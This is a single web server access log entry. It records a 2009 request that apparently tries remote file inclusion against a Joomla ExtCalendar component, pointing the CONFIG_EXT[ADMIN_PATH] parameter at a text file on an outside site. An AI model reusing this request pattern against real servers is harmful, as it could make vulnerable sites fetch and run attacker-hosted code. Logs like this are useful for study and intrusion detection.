222.236.47.23 - - [07/Sep/2009:10:20:34 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
